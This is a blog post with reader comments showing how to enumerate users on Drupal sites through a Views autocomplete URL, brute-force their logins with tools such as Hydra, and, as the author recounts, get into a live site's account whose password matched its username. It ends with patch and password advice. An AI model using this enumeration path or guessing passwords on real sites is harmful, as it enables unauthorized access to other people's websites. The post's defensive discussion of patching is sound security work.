As everybody knows, Drupal "is a free and open-source content management framework (CMF) written in PHP and distributed under the GNU General Public License. It is used as a back-end system for at least 2.1% of all websites worldwide ranging from personal blogs to corporate, political, and government sites... It is also used for knowledge management and business collaboration."
First of all, we need to detect some Drupal Installation. We are going to use Shodan. You can use the next query:
After you've selected one of them, we are going to look for all users in the website. You can check the next query:
http://URL/?q=admin/views/ajax/autocomplete/user/e
In this case, you can see all users that containing "e" in the username.
Then, we are going to go to the login page on http://URL/user/login and we are going to try to login with some of this users. You can use a Bruteforece with Backtrack using Hydra for example... In this case, We'll try manually.
Well, we are lucky guys!!! We are in the Ecopol's profile!!!! In this case, the username and the password were the same!!!
And... Can I add/edit/remove content of this Drupal Website? Just let me see...
Seems that if...
If you want, you can use a Script including in Backtrack called DPScan.py and you can get a list with every users on the Drupal Website.
But we are on the right side, in the Security Engineer or System Administrator side... What can we do? In this link, you can get the patch...
The best options to avoid this, always will be to have a complex password requirement...
Is there anyway to protect this using a directive like or something else ?
ReplyDeleteThanks
Hi!!!
DeleteHere you have the details about the Patch: http://www.madirish.net/node/465
I published how to obtain all users of a Drupal site automatically with a Namp's script. If you are interested in it, please visit the link below.
http://www.behindthefirewalls.com/2013/08/nmap-640-released-how-to-install-and.html
Thanks for your visit
Deciding upon a content management system is highly vital to your success I love Drupal. Because After all the most innovative sites such as the White House use Durpal, I picked Drupal For our hosting I like Pantheon with features like Drush integrations What Content Management System do you like?
ReplyDeleteIf I'm honest, I don't have specially predilection for any of them... I can tell you a lot of hackers who are hacking websites created with CMS like Drupal, Joomla o Wordpress. Also, a lot of security researchers are working hard to find out new vulnerabilites for these CMS because they are commonly spread. In my opinion, it's a great idea to hire a good security guy to make a proper web security audit.
DeleteThis issue has been addressed here: https://drupal.org/comment/6810554#comment-6810554
ReplyDeleteIt's patched and committed so upgrading the Views module or using a recent stable version of the module should be enough.
Drupal has an intricate permission system. Site builders don't always take enough care to make sure that all roles on the Drupal system are restricted enough. Even with the patch, if a site builder is careless enough to allow anonymous users access to view user profiles, this "security hole" will be open.